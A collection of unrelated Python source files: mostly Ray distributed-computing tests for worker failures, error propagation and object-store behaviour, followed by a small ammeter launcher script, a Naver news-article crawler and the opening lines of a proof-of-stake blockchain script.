[obj], _ = ray.wait([a.kill.remote()], timeout=5)
with pytest.raises(ray.exceptions.RayActorError):
ray.get(obj)
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(consume.remote(obj))
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_future_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
def sleep(self):
time.sleep(1)
a = Actor.remote()
pid = ray.get(a.getpid.remote())
tasks1 = [a.sleep.remote() for _ in range(10)]
os.kill(pid, 9)
time.sleep(0.1)
tasks2 = [a.sleep.remote() for _ in range(10)]
for obj in tasks1 + tasks2:
with pytest.raises(Exception):
ray.get(obj)
errors = get_error_message(p, 1, ray_constants.WORKER_DIED_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_DIED_PUSH_ERROR
def test_actor_worker_dying_nothing_in_progress(ray_start_regular):
@ray.remote(max_restarts=0)
class Actor:
def getpid(self):
return os.getpid()
a = Actor.remote()
pid = ray.get(a.getpid.remote())
os.kill(pid, 9)
time.sleep(0.1)
task2 = a.getpid.remote()
with pytest.raises(Exception):
ray.get(task2)
def test_actor_scope_or_intentionally_killed_message(ray_start_regular,
error_pubsub):
p = error_pubsub
@ray.remote
class Actor:
def __init__(self):
# This log is added to debug a flaky test issue.
print(os.getpid())
def ping(self):
pass
a = Actor.remote()
# Without this waiting, there seems to be race condition happening
# in the CI. This is not a fundamental fix for that, but it at least
# makes the test less flaky.
ray.get(a.ping.remote())
a = Actor.remote()
a.__ray_terminate__.remote()
time.sleep(1)
errors = get_error_message(p, 1)
assert len(errors) == 0, "Should not have propogated an error - {}".format(
errors)
def test_exception_chain(ray_start_regular):
@ray.remote
def bar():
return 1 / 0
@ray.remote
def foo():
return ray.get(bar.remote())
r = foo.remote()
try:
ray.get(r)
except ZeroDivisionError as ex:
assert isinstance(ex, RayTaskError)
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error1(ray_start_object_store_memory, error_pubsub):
p = error_pubsub
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_arg_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = single_dependency.remote(0, np.zeros(
object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_arg_task.remote()
# Make sure we receive the correct error message.
errors = get_error_message(p, 1,
ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR
@pytest.mark.skip("This test does not work yet.")
@pytest.mark.parametrize(
"ray_start_object_store_memory", [10**6], indirect=True)
def test_put_error2(ray_start_object_store_memory):
# This is the same as the previous test, but it calls ray.put directly.
num_objects = 3
object_size = 4 * 10**5
# Define a task with a single dependency, a numpy array, that returns
# another array.
@ray.remote
def single_dependency(i, arg):
arg = np.copy(arg)
arg[0] = i
return arg
@ray.remote
def put_task():
# Launch num_objects instances of the remote task, each dependent
# on the one before it. The result of the first task should get
# evicted.
args = []
arg = ray.put(np.zeros(object_size, dtype=np.uint8))
for i in range(num_objects):
arg = single_dependency.remote(i, arg)
args.append(arg)
# Get the last value to force all tasks to finish.
value = ray.get(args[-1])
assert value[0] == i
# Get the first value (which should have been evicted) to force
# reconstruction. Currently, since we're not able to reconstruct
# `ray.put` objects that were evicted and whose originating tasks
# are still running, this for-loop should hang and push an error to
# the driver.
ray.get(args[0])
put_task.remote()
# Make sure we receive the correct error message.
# get_error_message(ray_constants.PUT_RECONSTRUCTION_PUSH_ERROR, 1)
@pytest.mark.skip("Publish happeds before we subscribe it")
def test_version_mismatch(error_pubsub, shutdown_only):
ray_version = ray.__version__
ray.__version__ = "fake ray version"
ray.init(num_cpus=1)
p = error_pubsub
errors = get_error_message(p, 1, ray_constants.VERSION_MISMATCH_PUSH_ERROR)
assert False, errors
assert len(errors) == 1
assert errors[0].type == ray_constants.VERSION_MISMATCH_PUSH_ERROR
# Reset the version.
ray.__version__ = ray_version
def test_export_large_objects(ray_start_regular, error_pubsub):
p = error_pubsub
import ray.ray_constants as ray_constants
large_object = np.zeros(2 * ray_constants.PICKLE_OBJECT_WARNING_SIZE)
@ray.remote
def f():
large_object
# Invoke the function so that the definition is exported.
f.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
@ray.remote
class Foo:
def __init__(self):
large_object
Foo.remote()
# Make sure that a warning is generated.
errors = get_error_message(p, 1,
ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.PICKLING_LARGE_OBJECT_PUSH_ERROR
def test_warning_all_tasks_blocked(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Foo:
def f(self):
return 0
@ray.remote
def f():
# Creating both actors is not possible.
actors = [Foo.remote() for _ in range(3)]
for a in actors:
ray.get(a.f.remote())
# Run in a task to check we handle the blocked task case correctly
f.remote()
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_actor_waiting_on_actor(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Actor:
pass
a = Actor.remote() # noqa
b = Actor.remote() # noqa
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_task_waiting_on_actor(shutdown_only):
ray.init(
num_cpus=1, _system_config={"debug_dump_period_milliseconds": 500})
p = init_error_pubsub()
@ray.remote(num_cpus=1)
class Actor:
pass
a = Actor.remote() # noqa
@ray.remote(num_cpus=1)
def f():
print("f running")
time.sleep(999)
ids = [f.remote()] # noqa
errors = get_error_message(p, 1, ray_constants.RESOURCE_DEADLOCK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.RESOURCE_DEADLOCK_ERROR
def test_warning_for_infeasible_tasks(ray_start_regular, error_pubsub):
p = error_pubsub
# Check that we get warning messages for infeasible tasks.
@ray.remote(num_gpus=1)
def f():
pass
@ray.remote(resources={"Custom": 1})
class Foo:
pass
# This task is infeasible.
f.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
# This actor placement task is infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
def test_warning_for_infeasible_zero_cpu_actor(shutdown_only):
# Check that we cannot place an actor on a 0 CPU machine and that we get an
# infeasibility warning (even though the actor creation task itself
# requires no CPUs).
ray.init(num_cpus=0)
p = init_error_pubsub()
@ray.remote
class Foo:
pass
# The actor creation should be infeasible.
Foo.remote()
errors = get_error_message(p, 1, ray_constants.INFEASIBLE_TASK_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.INFEASIBLE_TASK_ERROR
p.close()
def test_warning_for_too_many_actors(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
@ray.remote
class Foo:
def __init__(self):
time.sleep(1000)
[Foo.remote() for _ in range(num_cpus * 3)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
[Foo.remote() for _ in range(num_cpus)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_too_many_nested_tasks(shutdown_only):
# Check that if we run a workload which requires too many workers to be
# started that we will receive a warning.
num_cpus = 2
ray.init(num_cpus=num_cpus)
p = init_error_pubsub()
remote_wait = Semaphore.remote(value=0)
nested_wait = Semaphore.remote(value=0)
ray.get([
remote_wait.locked.remote(),
nested_wait.locked.remote(),
])
@ray.remote
def f():
time.sleep(1000)
return 1
@ray.remote
def h(nested_waits):
nested_wait.release.remote()
ray.get(nested_waits)
ray.get(f.remote())
@ray.remote
def g(remote_waits, nested_waits):
# Sleep so that the f tasks all get submitted to the scheduler after
# the g tasks.
remote_wait.release.remote()
# wait until every lock is released.
ray.get(remote_waits)
ray.get(h.remote(nested_waits))
num_root_tasks = num_cpus * 4
# Lock remote task until everything is scheduled.
remote_waits = []
nested_waits = []
for _ in range(num_root_tasks):
remote_waits.append(remote_wait.acquire.remote())
nested_waits.append(nested_wait.acquire.remote())
[g.remote(remote_waits, nested_waits) for _ in range(num_root_tasks)]
errors = get_error_message(p, 1, ray_constants.WORKER_POOL_LARGE_ERROR)
assert len(errors) == 1
assert errors[0].type == ray_constants.WORKER_POOL_LARGE_ERROR
p.close()
def test_warning_for_many_duplicate_remote_functions_and_actors(shutdown_only):
ray.init(num_cpus=1)
@ray.remote
def create_remote_function():
@ray.remote
def g():
return 1
return ray.get(g.remote())
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_remote_function.remote())
import io
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): It's terrible to have to rely on this implementation detail,
# the fact that the warning comes from ray.import_thread.logger. However,
# I didn't find a good way to capture the output for all loggers
# simultaneously.
ray.import_thread.logger.addHandler(ch)
ray.get(create_remote_function.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "remote function" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
# Now test the same thing but for actors.
@ray.remote
def create_actor_class():
# Require a GPU so that the actor is never actually created and we
# don't spawn an unreasonable number of processes.
@ray.remote(num_gpus=1)
class Foo:
pass
Foo.remote()
for _ in range(ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD - 1):
ray.get(create_actor_class.remote())
log_capture_string = io.StringIO()
ch = logging.StreamHandler(log_capture_string)
# TODO(rkn): As mentioned above, it's terrible to have to rely on this
# implementation detail.
ray.import_thread.logger.addHandler(ch)
ray.get(create_actor_class.remote())
start_time = time.time()
while time.time() < start_time + 10:
log_contents = log_capture_string.getvalue()
if len(log_contents) > 0:
break
ray.import_thread.logger.removeHandler(ch)
assert "actor" in log_contents
assert "has been exported {} times.".format(
ray_constants.DUPLICATE_REMOTE_FUNCTION_THRESHOLD) in log_contents
def test_redis_module_failure(ray_start_regular):
address_info = ray_start_regular
address = address_info["redis_address"]
address = address.split(":")
assert len(address) == 2
def run_failure_test(expecting_message, *command):
with pytest.raises(
Exception, match=".*{}.*".format(expecting_message)):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
def run_one_command(*command):
client = redis.StrictRedis(
host=address[0],
port=int(address[1]),
password=ray_constants.REDIS_DEFAULT_PASSWORD)
client.execute_command(*command)
run_failure_test("wrong number of arguments", "RAY.TABLE_ADD", 13)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_ADD", 100000, 1, 1, 1)
run_failure_test("Prefix must be in the TablePrefix range",
"RAY.TABLE_REQUEST_NOTIFICATIONS", 100000, 1, 1, 1)
run_failure_test("Prefix must be a valid TablePrefix integer",
"RAY.TABLE_ADD", b"a", 1, 1, 1)
run_failure_test("Pubsub channel must be in the TablePubsub range",
"RAY.TABLE_ADD", 1, 10000, 1, 1)
run_failure_test("Pubsub channel must be a valid integer", "RAY.TABLE_ADD",
1, b"a", 1, 1)
# Change the key from 1 to 2, since the previous command should have
# succeeded at writing the key, but not publishing it.
run_failure_test("Index is less than 0.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
-1)
run_failure_test("Index is not a number.", "RAY.TABLE_APPEND", 1, 1, 2, 1,
b"a")
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
# It's okay to add duplicate entries.
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 0)
run_one_command("RAY.TABLE_APPEND", 1, 1, 2, 1, 1)
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
# It's okey to add duplicate entries.
run_one_command("RAY.SET_ADD", 1, 1, 3, 1)
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# It's okey to remove duplicate entries.
run_one_command("RAY.SET_REMOVE", 1, 1, 3, 1)
# Note that this test will take at least 10 seconds because it must wait for
# the monitor to detect enough missed heartbeats.
def test_warning_for_dead_node(ray_start_cluster_2_nodes, error_pubsub):
cluster = ray_start_cluster_2_nodes
cluster.wait_for_nodes()
p = error_pubsub
node_ids = {item["NodeID"] for item in ray.nodes()}
# Try to make sure that the monitor has received at least one heartbeat
# from the node.
time.sleep(0.5)
# Kill both raylets.
cluster.list_all_nodes()[1].kill_raylet()
cluster.list_all_nodes()[0].kill_raylet()
# Check that we get warning messages for both raylets.
errors = get_error_message(p, 2, ray_constants.REMOVED_NODE_ERROR, 40)
# Extract the client IDs from the error messages. This will need to be
# changed if the error message changes.
warning_node_ids = {error.error_message.split(" ")[5] for error in errors}
assert node_ids == warning_node_ids
def test_raylet_crash_when_get(ray_start_regular):
def sleep_to_kill_raylet():
# Don't kill raylet before default workers get connected.
time.sleep(2)
ray.worker._global_node.kill_raylet()
object_ref = ray.put(np.zeros(200 * 1024, dtype=np.uint8))
ray.internal.free(object_ref)
thread = threading.Thread(target=sleep_to_kill_raylet)
thread.start()
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(object_ref)
thread.join()
def test_connect_with_disconnected_node(shutdown_only):
config = {
"num_heartbeats_timeout": 50,
"raylet_heartbeat_period_milliseconds": 10,
}
cluster = Cluster()
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
p = init_error_pubsub()
errors = get_error_message(p, 1, timeout=5)
assert len(errors) == 0
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGKILL, ray_monitor will mark it to dead.
dead_node = cluster.add_node(num_cpus=0)
cluster.remove_node(dead_node, allow_graceful=False)
errors = get_error_message(p, 1, ray_constants.REMOVED_NODE_ERROR)
assert len(errors) == 1
# This node is killed by SIGTERM, ray_monitor will not mark it again.
removing_node = cluster.add_node(num_cpus=0)
cluster.remove_node(removing_node, allow_graceful=True)
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
# There is no connection error to a dead node.
errors = get_error_message(p, 1, timeout=2)
assert len(errors) == 0
p.close()
@pytest.mark.parametrize(
"ray_start_cluster_head", [{
"num_cpus": 5,
"object_store_memory": 10**8,
}],
indirect=True)
def test_parallel_actor_fill_plasma_retry(ray_start_cluster_head):
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 // 2, dtype=np.uint8)
actors = [LargeMemoryActor.remote() for _ in range(5)]
for _ in range(10):
pending = [a.some_expensive_task.remote() for a in actors]
while pending:
[done], pending = ray.wait(pending, num_returns=1)
def test_fill_object_store_exception(shutdown_only):
ray.init(
num_cpus=2,
object_store_memory=10**8,
_system_config={"automatic_object_spilling_enabled": False})
@ray.remote
def expensive_task():
return np.zeros((10**8) // 10, dtype=np.uint8)
with pytest.raises(ray.exceptions.RayTaskError) as e:
ray.get([expensive_task.remote() for _ in range(20)])
with pytest.raises(ray.exceptions.ObjectStoreFullError):
raise e.as_instanceof_cause()
@ray.remote
class LargeMemoryActor:
def some_expensive_task(self):
return np.zeros(10**8 + 2, dtype=np.uint8)
def test(self):
return 1
actor = LargeMemoryActor.remote()
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(actor.some_expensive_task.remote())
# Make sure actor does not die
ray.get(actor.test.remote())
with pytest.raises(ray.exceptions.ObjectStoreFullError):
ray.put(np.zeros(10**8 + 2, dtype=np.uint8))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 1,
"num_cpus": 2,
}, {
"num_nodes": 2,
"num_cpus": 1,
}],
indirect=True)
def test_eviction(ray_start_cluster):
@ray.remote
def large_object():
return np.zeros(10 * 1024 * 1024)
obj = large_object.remote()
assert (isinstance(ray.get(obj), np.ndarray))
# Evict the object.
ray.internal.free([obj])
# ray.get throws an exception.
with pytest.raises(ray.exceptions.ObjectLostError):
ray.get(obj)
@ray.remote
def dependent_task(x):
return
# If the object is passed by reference, the task throws an
# exception.
with pytest.raises(ray.exceptions.RayTaskError):
ray.get(dependent_task.remote(obj))
@pytest.mark.parametrize(
"ray_start_cluster", [{
"num_nodes": 2,
"num_cpus": 1,
}, {
"num_nodes": 1,
"num_cpus": 2,
}],
indirect=True)
def test_serialized_id(ray_start_cluster):
@ray.remote
def small_object():
# Sleep a bit before creating the object to force a timeout
# at the getter.
time.sleep(1)
return 1
@ray.remote
def dependent_task(x):
return x
@ray.remote
def get(obj_refs, test_dependent_task):
print("get", obj_refs)
obj_ref = obj_refs[0]
if test_dependent_task:
assert ray.get(dependent_task.remote(obj_ref)) == 1
else:
assert ray.get(obj_ref) == 1
obj = small_object.remote()
ray.get(get.remote([obj], False))
obj = small_object.remote()
ray.get(get.remote([obj], True))
obj = ray.put(1)
ray.get(get.remote([obj], False))
obj = ray.put(1)
ray.get(get.remote([obj], True))
@pytest.mark.parametrize("use_actors,node_failure",
[(False, False), (False, True), (True, False),
(True, True)])
def test_fate_sharing(ray_start_cluster, use_actors, node_failure):
config = {
"num_heartbeats_timeout": 10,
"raylet_heartbeat_period_milliseconds": 100,
}
cluster = Cluster()
# Head node with no resources.
cluster.add_node(num_cpus=0, _system_config=config)
ray.init(address=cluster.address)
# Node to place the parent actor.
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
# Node to place the child actor.
cluster.add_node(num_cpus=1, resources={"child": 1})
cluster.wait_for_nodes()
@ray.remote
def sleep():
time.sleep(1000)
@ray.remote(resources={"child": 1})
def probe():
return
# TODO(swang): This test does not pass if max_restarts > 0 for the
# raylet codepath. Add this parameter once the GCS actor service is enabled
# by default.
@ray.remote
class Actor(object):
def __init__(self):
return
def start_child(self, use_actors):
if use_actors:
child = Actor.options(resources={"child": 1}).remote()
ray.get(child.sleep.remote())
else:
ray.get(sleep.options(resources={"child": 1}).remote())
def sleep(self):
time.sleep(1000)
def get_pid(self):
return os.getpid()
# Returns whether the "child" resource is available.
def child_resource_available():
p = probe.remote()
ready, _ = ray.wait([p], timeout=1)
return len(ready) > 0
# Test fate sharing if the parent process dies.
def test_process_failure(use_actors):
a = Actor.options(resources={"parent": 1}).remote()
pid = ray.get(a.get_pid.remote())
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
os.kill(pid, 9)
wait_for_condition(child_resource_available)
# Test fate sharing if the parent node dies.
def test_node_failure(node_to_kill, use_actors):
a = Actor.options(resources={"parent": 1}).remote()
a.start_child.remote(use_actors=use_actors)
# Wait for the child to be scheduled.
wait_for_condition(lambda: not child_resource_available())
# Kill the parent process.
cluster.remove_node(node_to_kill, allow_graceful=False)
node_to_kill = cluster.add_node(num_cpus=1, resources={"parent": 1})
wait_for_condition(child_resource_available)
return node_to_kill
if node_failure:
test_node_failure(node_to_kill, use_actors)
else:
test_process_failure(use_actors)
ray.state.state._check_connected()
keys = [
key for r in ray.state.state.redis_clients
for key in r.keys("WORKER_FAILURE*")
]
if node_failure:
assert len(keys) <= 1, len(keys)
else:
assert len(keys) <= 2, len(keys)
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"ping_gcs_rpc_server_max_retries": 100
}
}],
indirect=True)
def test_gcs_server_failiure_report(ray_start_regular, log_pubsub):
p = log_pubsub
# Get gcs server pid to send a signal.
all_processes = ray.worker._global_node.all_processes
gcs_server_process = all_processes["gcs_server"][0].process
gcs_server_pid = gcs_server_process.pid
os.kill(gcs_server_pid, signal.SIGBUS)
msg = None
cnt = 0
# wait for max 30 seconds.
while cnt < 3000 and not msg:
msg = p.get_message()
if msg is None:
time.sleep(0.01)
cnt += 1
continue
data = json.loads(ray.utils.decode(msg["data"]))
assert data["pid"] == "gcs_server"
@pytest.mark.parametrize(
"ray_start_regular", [{
"_system_config": {
"task_retry_delay_ms": 500
}
}],
indirect=True)
def test_async_actor_task_retries(ray_start_regular):
# https://github.com/ray-project/ray/issues/11683
signal = SignalActor.remote()
@ray.remote
class DyingActor:
def __init__(self):
print("DyingActor init called")
self.should_exit = False
def set_should_exit(self):
print("DyingActor.set_should_exit called")
self.should_exit = True
async def get(self, x, wait=False):
print(f"DyingActor.get called with x={x}, wait={wait}")
if self.should_exit:
os._exit(0)
if wait:
await signal.wait.remote()
return x
# Normal in order actor task retries should work
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
assert ray.get(dying.get.remote(1)) == 1
ray.get(dying.set_should_exit.remote())
assert ray.get(dying.get.remote(42)) == 42
# Now let's try out of order retries:
# Task seqno 0 will return
# Task seqno 1 will be pending and retried later
# Task seqno 2 will return
# Task seqno 3 will crash the actor and retried later
dying = DyingActor.options(
max_restarts=-1,
max_task_retries=-1,
).remote()
# seqno 0
ref_0 = dying.get.remote(0)
assert ray.get(ref_0) == 0
# seqno 1
ref_1 = dying.get.remote(1, wait=True)
# seqno 2
ref_2 = dying.set_should_exit.remote()
assert ray.get(ref_2) is None
# seqno 3, this will crash the actor because previous task set should exit
# to true.
ref_3 = dying.get.remote(3)
# At this point the actor should be restarted. The two pending tasks
# [ref_1, ref_3] should be retried, but not the completed tasks [ref_0,
# ref_2]. Critically, if ref_2 was retried, ref_3 can never return.
ray.get(signal.send.remote())
assert ray.get(ref_1) == 1
assert ray.get(ref_3) == 3
if __name__ == "__main__":
import pytest
sys.exit(pytest.main(["-v", __file__]))
|
run_ammeter.py
|
# listen_join_request, ListenJoinSuccessThreading
from ammeter.main import listen_ammeter_request
from ammeter.main import test_post
import threading
from gevent import monkey
monkey.patch_socket()
import gevent
if __name__ == '__main__':
# gevent.joinall([
# # gevent.spawn(listen_ammeter_request),
# gevent.spawn(test_post),
# ])
threads = []
# threads.append(threading.Thread(target=test_post))
threads.append(threading.Thread(target=listen_ammeter_request))
for t in threads:
t.start()
|
articlecrawler.py
|
#!/usr/bin/env python
# -*- coding: utf-8, euc-kr -*-
from time import sleep
from bs4 import BeautifulSoup
from multiprocessing import Process
from exceptions import *
from articleparser import ArticleParser
from writer import Writer
import os
import platform
import calendar
import requests
import re
class ArticleCrawler(object):
def __init__(self):
self.categories = {'정치': 100, '경제': 101, '사회': 102, '생활문화': 103, '세계': 104, 'IT과학': 105, '오피니언': 110,
'politics': 100, 'economy': 101, 'society': 102, 'living_culture': 103, 'world': 104,
'IT_science': 105, 'opinion': 110}
self.selected_categories = []
self.date = {'start_year': 0, 'start_month': 0, 'end_year': 0, 'end_month': 0}
self.user_operating_system = str(platform.system())
def set_category(self, *args):
for key in args:
if self.categories.get(key) is None:
raise InvalidCategory(key)
self.selected_categories = args
def set_date_range(self, start_year, start_month, end_year, end_month):
args = [start_year, start_month, end_year, end_month]
if start_year > end_year:
raise InvalidYear(start_year, end_year)
if start_month < 1 or start_month > 12:
raise InvalidMonth(start_month)
if end_month < 1 or end_month > 12:
raise InvalidMonth(end_month)
if start_year == end_year and start_month > end_month:
raise OverbalanceMonth(start_month, end_month)
for key, date in zip(self.date, args):
self.date[key] = date
print(self.date)
@staticmethod
def make_news_page_url(category_url, start_year, end_year, start_month, end_month):
print("here is make_news_page_url")
made_urls = []
for year in range(start_year, end_year + 1):
print("start_year , end_year = " + " " + str(start_year) + " " + str(end_year))
print("start_month , end_month = " + " " + str(start_month) + " " + str(end_month))
if start_year == end_year:
year_startmonth = start_month
year_endmonth = end_month
else:
if year == start_year:
year_startmonth = start_month
year_endmonth = 12
elif year == end_year:
year_startmonth = 1
year_endmonth = end_month
else:
year_startmonth = 1
year_endmonth = 12
for month in range(year_startmonth, year_endmonth + 1):
for month_day in range(1, calendar.monthrange(year, month)[1] + 1):
# for month_day in range(1, 2):
print("month, day = " + str(month) + " " + str(month_day))
if len(str(month)) == 1:
month = "0" + str(month)
if len(str(month_day)) == 1:
month_day = "0" + str(month_day)
# 날짜별로 Page Url 생성
url = category_url + str(year) + str(month) + str(month_day)
print("url = " + url)
# totalpage는 네이버 페이지 구조를 이용해서 page=10000으로 지정해 totalpage를 알아냄
# page=10000을 입력할 경우 페이지가 존재하지 않기 때문에 page=totalpage로 이동 됨 (Redirect)
totalpage = ArticleParser.find_news_totalpage(url + "&page=10000")
print("totalpage = " + str(totalpage))
for page in range(1, totalpage + 1):
made_urls.append(url + "&page=" + str(page))
return made_urls
@staticmethod
def get_url_data(url, max_tries=10):
remaining_tries = int(max_tries)
while remaining_tries > 0:
try:
# print("url = " + url)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
result = requests.get(url, headers = headers).text
# print("result = " + str(result))
return result
except requests.exceptions:
sleep(60)
remaining_tries = remaining_tries - 1
raise ResponseTimeout()
def crawling(self, category_name):
# Multi Process PID
print(category_name + " PID: " + str(os.getpid()))
writer = Writer(category_name=category_name, date=self.date)
# 기사 URL 형식
url = "http://news.naver.com/main/list.nhn?mode=LSD&mid=sec&sid1=" + str(
self.categories.get(category_name)) + "&date="
print("url = " + url )
# start_year년 start_month월 ~ end_year의 end_month 날짜까지 기사를 수집합니다.
day_urls = self.make_news_page_url(url, self.date['start_year'], self.date['end_year'],
self.date['start_month'], self.date['end_month'])
# for tmp in day_urls:
# print("day_urls =" + " " + tmp)
print(category_name + " Urls are generated")
print("The crawler starts")
for URL in day_urls:
print(URL)
regex = re.compile("date=(\d+)")
news_date = regex.findall(URL)[0]
request = self.get_url_data(URL)
document = BeautifulSoup(request, 'html.parser')
# html - newsflash_body - type06_headline, type06
# 각 페이지에 있는 기사들 가져오기
post_temp = document.select('.newsflash_body .type06_headline li dl')
post_temp.extend(document.select('.newsflash_body .type06 li dl'))
# 각 페이지에 있는 기사들의 url 저장
post = []
for line in post_temp:
post.append(line.a.get('href')) # 해당되는 page에서 모든 기사들의 URL을 post 리스트에 넣음
del post_temp
# for tmp in post:
# print("post =" + " " + tmp)
for content_url in post: # 기사 URL
# 크롤링 대기 시간
sleep(0.01)
# 기사 HTML 가져옴
request_content = self.get_url_data(content_url)
# print("request_content = " + request_content)
try:
document_content = BeautifulSoup(request_content, 'html.parser')
# print("document_content = " + str(document_content))
except:
continue
try:
# 기사 제목 가져옴
tag_headline = document_content.find_all('h3', {'id': 'articleTitle'}, {'class': 'tts_head'})
# print("tag_headline = " + str(tag_headline))
text_headline = '' # 뉴스 기사 제목 초기화
text_headline = text_headline + ArticleParser.clear_headline(str(tag_headline[0].find_all(text=True)))
# print("text_headline = " + text_headline)
if not text_headline: # 공백일 경우 기사 제외 처리
continue
# 기사 본문 가져옴
tag_content = document_content.find_all('div', {'id': 'articleBodyContents'})
# print("tag_content = " + str(tag_content))
text_sentence = '' # 뉴스 기사 본문 초기화
text_sentence = text_sentence + ArticleParser.clear_content(str(tag_content[0].find_all(text=True)))
# print("tag_content = " + str(tag_content))
if not text_sentence: # 공백일 경우 기사 제외 처리
continue
# 기사 언론사 가져옴
tag_company = document_content.find_all('meta', {'property': 'me2:category1'})
# print("tag_company = " + str(tag_company))
text_company = '' # 언론사 초기화
text_company = text_company + str(tag_company[0].get('content'))
# print("text_company = " + str(text_company))
if not text_company: # 공백일 경우 기사 제외 처리
continue
# CSV 작성
wcsv = writer.get_writer_csv()
wcsv.writerow([news_date, category_name, text_company, text_headline, text_sentence, content_url])
del text_company, text_sentence, text_headline
del tag_company
del tag_content, tag_headline
del request_content, document_content
except Exception as ex: # UnicodeEncodeError ..
wcsv.writerow([ex, content_url])
del request_content, document_content
pass
# writer.close()
def start(self):
# MultiProcess 크롤링 시작
for category_name in self.selected_categories:
proc = Process(target=self.crawling, args=(category_name,))
proc.start()
|
pos.py
|
#!/usr/bin/env python3
"""
This document is created by magic at 2018/8/17
"""
import time
import json
import threading
from hashlib import sha256
from datetime import datetime
from random import choice
from queue import Queue, Empty
from socketserver import BaseRequestHandler, ThreadingTCPServer
# need two queue
# 定义变量
block_chain = []
temp_blocks = []
